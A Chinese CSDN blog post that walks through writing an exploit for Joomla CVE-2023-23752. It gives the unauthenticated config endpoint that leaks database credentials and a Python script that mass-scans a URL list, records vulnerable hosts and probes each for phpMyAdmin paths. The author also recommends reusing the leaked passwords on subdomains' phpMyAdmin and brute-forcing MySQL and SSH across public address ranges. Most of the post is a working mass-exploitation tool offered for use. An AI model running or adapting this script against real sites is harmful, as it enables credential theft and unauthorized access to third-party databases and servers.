2.joomla-cve-2023-23752_exp编写

最新推荐文章于 2024-05-21 14:11:46 发布
最新推荐文章于 2024-05-21 14:11:46 发布
阅读量64 收藏
点赞数
分类专栏: exp编写,漏洞复现 文章标签: web安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43976688/article/details/132746290
版权

0x01 漏洞详情

  • 项目: Joomla!
  • 子项目: CMS
  • 影响:严重
  • 严重性: 高
  • 概率:高
  • 版本: 4.0.0-4.2.7
  • 利用类型:不正确的访问控制
  • 报告日期: 2023-02-13
  • 修复日期: 2023-02-16
  • CVE 编号: CVE-2023-23752

其实就是一个未授权接口,访问后就可以读取数据库密码,如果单单利用该漏洞其实干不了多大事。其实就利用到我们的渗透思路。
1.判断漏洞的同时判断是否存在phpmyadmin
2.如果不存在phpmyadmin或者adminer此类的东西我们又该如何利用?收集子域名批量判断是否存在phpmyadmin用该漏洞获取到的数据库密码去尝试子域名的phpmyadmin。用该账号密码批量爆破公网c段的mysql或者ssh服务。

如何判断目标cms是否为joomla,当然常见的可以通过一些扫描工具,如果是手工的话我们可以查看一些url特征,例如前台的一些文章为:http://www.redteamxxx.com/index.php/xxxx这类的,或者通过joomla后台url来判断:http://www.redteamxxx.com/administrator/。

0x02 受影响的版本

Joomla! CMS 版本 4.0.0-4.2.7

0x03 poc

这里就用网上的图了,懒得搭建了。

/api/index.php/v1/config/application?public=true

在这里插入图片描述
意思其实就是一个未授权接口,访问后就会回显数据库账号密码。
在这里插入图片描述
可以看到访问该url后回显数据库密码,所以该漏洞要配合phpmyadmin或者开放3306才能组合利用。
这里我们就判断是否存在phpmyadmin。
同理读取 url.txt 。然后访问该完整的url判断状态码。

import requests,warnings
from requests.packages import urllib3
urllib3.disable_warnings()
warnings.filterwarnings("ignore")
f = open("url.txt","r")
lines = f.readlines()
for line in lines:
	url = line.strip()
	print("[*]try to fuck "+url)
	if(url.endswith('/')):
		url = url[:-1]
	payload_url = url + "/api/index.php/v1/config/application?public=true"

然后获取相应包,如果存在漏洞那么相应包就会回显 password 关键字,所以我们只需要判断该关键字
是否在响应包即可。最终判断是否存在phpmyadmin目录。

import requests,warnings
from requests.packages import urllib3
urllib3.disable_warnings()
warnings.filterwarnings("ignore")
f = open("url.txt","r")
lines = f.readlines()
for line in lines:
	url = line.strip()
	print("[*]try to fuck "+url)
	if(url.endswith('/')):
		url = url[:-1]
	payload_url = url + "/api/index.php/v1/config/application?public=true"
	directories = ['/phpmyadmin/', '/phpMyAdmin/', '/pma/','/PMA/']
	try:
		response = requests.get(payload_url,timeout=5)
		status_code = response.status_code
		if(status_code) == 200:
			if("password" in response.text):
				print("[+]"+payload_url+" is ok!")
				for directory in directories:
					mysql_url = url + directory
					response2 = requests.get(mysql_url,timeout=5).status_code
					if(response2 != 404):
						print("[+]"+mysql_url+" is exist")
						f = open("pma.txt","a")
						f.write(mysql_url+"\r\n")
						f.close()
				f = open("result.txt","a")
				f.write(url+"\r\n")
				f.close()
	except Exception:
		continue

在这里插入图片描述

一寸一叶
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Joomla_3.9.16-Stable-Full_Package.zip
04-11
Joomla!是一套全球知名的内容管理系统。Joomla!是使用PHP语言加上MySQL数据库所开发的软件系统,目前最新版本是3.9.16。可以在Linux、 Windows、MacOSX等各种不同的平台上执行...
Joomla目录遍历及远程代码(CVE-2021-23132)--避坑指南
huayimy的博客
01-11 735
Joomla目录遍历及远程代码(CVE-2021-23132)--避坑指南,脚本复现,在线靶场,版本,phpinfo(),添加webshell添加一句话木马
PHPMailer 命令执行漏洞(CVE-2016-10033)分析
浮生若梦的专栏
01-01 9036
PHPMailer是一个基于PHP语言的邮件发送组件,被广泛运用于诸如WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等用户量巨大的应用与框架中。 CVE-2016-10033是PHPMailer中存在的高危安全漏洞,攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,造成远程命令执行的危害。 对比一下新老版本: https://github
Joomla漏洞
热门推荐
Grey的博客
07-09 1万+
开始复现漏洞
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 369
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5282
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
mysql poc_你的PoC和EXP可能得改改了
weixin_33255691的博客
01-19 329
一、前言在MySQL 5.7.5之前的所有主版本存在一个BUG,该可能导致影响POC/EXP需要重新编写或修正的问题。BUG信息链接:二、问题说明在BUG说明中,可以通过以下SQL语句复现:set names latin1;drop table if exists t1;create table t1(a int) engine=myisam;insert into t1 values (0),(...
『VulnHub系列』View2aKill: 1-Walkthrough
ins1ght的博客
12-09 1047
靶机发布日期:2019年10月29日,难度:中等。这篇博客在2019年11月21日就已经完成了,但是无奈某某办法出现了,所以里面关于CVE:2019-15814漏洞复现的地方删去了众多细节,请谅解!!!完成这个靶机的关键在于如何得到Sentrifugo系统的低权限账号的密码,其他的就是动动手~
红蓝对抗-红队渗透下的入口权限快速获取
lza20001103的博客
09-05 873
红队渗透下的入口权限快速获取 文章目录红队渗透下的入口权限快速获取前言红队攻击流程概述获取入口权限利用常见组件的漏洞高危漏洞的检测与攻击POC的集成与自动化验证POC bomber 前言 近年来各种大规模的红蓝对抗逐渐兴起,攻防实战受到了更多的重视。对抗时红队模拟真实黑客的攻击行为,对企业网络应用系统进行渗透攻击,最终能发现企业平时未注意到的风险点,达到完善企业的安全体系的目的。 本文站在红队攻击的角度,介绍一种在红队攻击初期快速通过已知Nday漏洞获取入口权限的思路,并编写成工具供红队渗透测试人员使用。
安全工具库-免费(开源)
weixin_30790841的博客
03-22 837
安全工具库-免费(开源) https://github.com/We5ter/Scanners-Box/blob/master/README_CN.md 项目简介 Scanners Box (简称 - scanbox)是一个集合github平台上的安全行业从业者自研开源扫描器的仓库,包括子域名枚举、数据库漏洞扫描、弱口令或信息泄漏扫描、端口扫描、指纹识别以及其他大型扫描器或模块...
joomla-brute-v2.rar_V2
09-21
scan vulns of web servers and a port scanner
cve-2023-23752扫描poc
04-24
joomla未授权访问cve-2023-23752扫描poc: Joomla是一套全球知名的内容管理系统(CMS),其使用PHP语言加上MySQL数据库所开发,可以在Linux、Windows、MacOSX等各种不同的平台上运行。 2月16日,Joomla官方发布安全...
Joomla_2.5.25-Stable-Full_Package_joomla_full_
10-02
Joomla 2.5.25 full install
Joomla_3.9.20-Stable-Full_Package.zip
08-12
joomla 3.9.20 个人博客系统 基于PHP语言和MySQL数据库开发,可以加载各类主题模板、插件。
前端基础入门三大核心之网络安全篇:TLS/SSL的魔法之旅
最新发布
一个做过前端开发的产品经理,经历过睿智产品的折磨导致脱发之后,励志要翻身"农奴"把歌唱,一边打入敌人内部一边持续提升自己,为我们广大开发同胞谋福祉,坚决抵制睿智产品折磨我们码农兄弟!
05-21 560
TLS/SSL,这个看似复杂的协议,实际上正默默地守护着我们每一次的在线交互。作为前端开发者,理解其工作原理并在日常开发中实践安全最佳实践,是我们每个人的职责。现在,当你再次看到地址栏那个绿色的小锁图标时,是不是觉得它更加亲切了呢?关于TLS/SSL,你还有哪些独到的见解或实战经历?欢迎在评论区留言,让我们共同探讨,携手营造一个更安全的网络环境。欢迎来到我的博客,很高兴能够在这里和您见面!希望您在这里可以感受到一份轻松愉快的氛围,不仅可以获得有趣的内容和知识,也可以畅所欲言、分享您的想法和见解。
web安全之登录框渗透骚姿势,新思路
qq_47289634的博客
05-10 601
越权漏洞的挖掘大部分是通过对比两个用户的请求包以及响应包,来观察不同之处,有的时候替换一下响应包就直接越权,其中特别要关注的是uid,这里在挖掘逻辑漏洞和越权漏洞时建议使用burp中的compare模块进行两个数据包的比对,非常直观。width=500&height=100导致可以随意更改大小,配合脚本批量请求,很容易就会把带宽占满,造成dos攻击。不管漏洞挖掘还是挖SRC,登录框都是重点关注对象,什么漏洞都有可能出现,登录框也是框,见框就插就对了,说不定会有奇效。看到登录框,输入信息后,抓包。
了解网络安全行业内有哪些公司?
aheyor的博客
05-14 928
https://wenku.baidu.com/view/8de38c790440be1e650e52ea551810a6f424c80f?aggId=f2f58cc8e618964bcf84b9d528ea81c758f52ecc&fr=catalogMain_text_ernie_recall_feed_index%3Awk_recommend_main4&_wkts_=1715651666515&bdQuery=%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85
CTF如何学习?
小司机的奥拓
05-14 925
作和项目会带来影响,毕竟你不可能打一辈子的CTF,而CTF和实战还是有区别,过度沉浸于CTF的模式当中会让你在实战中却无从下手**
CVE-2016-8870
09-16
CVE-2016-8870是Joomla的一个漏洞编号。该漏洞位于Joomla的注册功能代码中,具体位于components/com_users/controllers/user.php和components/com_users/controllers/registration.php中的相应函数中。通过该漏洞,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值